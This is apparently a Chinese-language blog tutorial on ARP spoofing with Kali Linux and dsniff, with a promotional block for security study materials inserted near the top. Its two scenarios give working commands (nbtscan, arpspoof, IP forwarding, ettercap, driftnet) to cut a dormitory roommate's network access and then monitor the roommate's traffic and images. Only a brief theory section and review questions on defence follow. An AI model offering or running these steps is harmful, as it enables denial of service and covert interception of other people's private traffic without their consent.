x00、軟體安裝及環境搭建
第一步、Kali下載下傳導入
Kali下載下傳位址(VMware版本):
https://images.kali.org/virtual-images/kali-linux-2020.4-vmware-amd64.7z
解壓後,打開VMware,
【——全網最全的網絡安全學習資料包分享給愛學習的你,關注我,私信回複“領取”擷取——】
1.網絡安全多個方向學習路線
2.全網最全的CTF入門學習資料
3.一線大佬實戰經驗分享筆記
4.網安大廠面試題合集
5.紅藍對抗實戰技術秘籍
6.網絡安全基礎入門、Linux、web安全、滲透測試方面視訊
第二步、Dsniff套件安裝
Dsniff是一個基于unix系統網絡嗅探工具。
Dsniff是一個工具集,主要分為四類:
- 純粹被動地進行網絡活動監視的工具,包括:dsniff、filesnarf、mailsnarf 、msgsnarf、urlsnarf、webspy;
- 針對SSH和SSL的MITM(Man-In-The-Middle)"攻擊"工具,包括sshmitm和webmitm;
- 發起主動欺騙的工具,包括:arpspoof、dnsspoof、macof;
- 其它工具,包括tcpkill、tcpnice。
kali@kali:~#sudo apt-get update #更新軟體清單
kali@kali:~# sudo apt-get install dsniff #從軟體清單中下載下傳安裝dsniff
測試是否安裝成功
我們發現其實運作這個軟體和權限是息息相關的,我們切換root運作
涉及到的軟體都能夠正常運作(本文僅僅涉及到arpspoof)
0x01、場景一(讓宿舍室友斷網)
第一步、找到室友的ip
NBTSCAN可以擷取到PC的真實IP位址和MAC位址。
nbtscan -r 192.168.10.17/24
第二步、讓他斷網
arpspoof -i 網卡 -t 目标IP 網關
arpspoof -i eth0 -t 192.168.8.213 192.168.8.1
#0x02、場景二(監控室友網絡)
第一步、開啟ip轉發功能(讓他上網)
為使受害者主機的資料包能夠順利收發,我們需在Kali Linux中開啟IP轉發功能
A、開啟:echo 1 > /proc/sys/net/ipv4/ip_forward;
第二步、開啟流量嗅探工具
driftnet 用于抓取網絡流量中的圖檔,并将他們顯示出來。ettercap是一個基于ARP位址欺騙方式的網絡嗅探工具,主要适用于交換區域網路絡。
apt-get install driftnet //安裝driftnet工具
ettercap -Tq -i eth0 //-T是僅使用文本GUI,-q不顯示資料内容,-i是指定網卡
driftnet -i eth0 //選擇監聽端口為eth0
wireshark
0x03、場景三(實戰案例介紹)
0x04、原理分析
第一步、ARP請求
第二步、ARP響應
前提知識:
- ARP是幹啥的?
Arp是位址解析協定,通過ip擷取mac位址的協定(同網段才能擷取)
2.為啥要擷取mac位址?
表面上我們看到的是通過ip進行通信,實際上區域網路都是通過mac位址進行通信,
0x05、思考題
ARP攻擊應用場景?
ARP攻擊應該如何防護?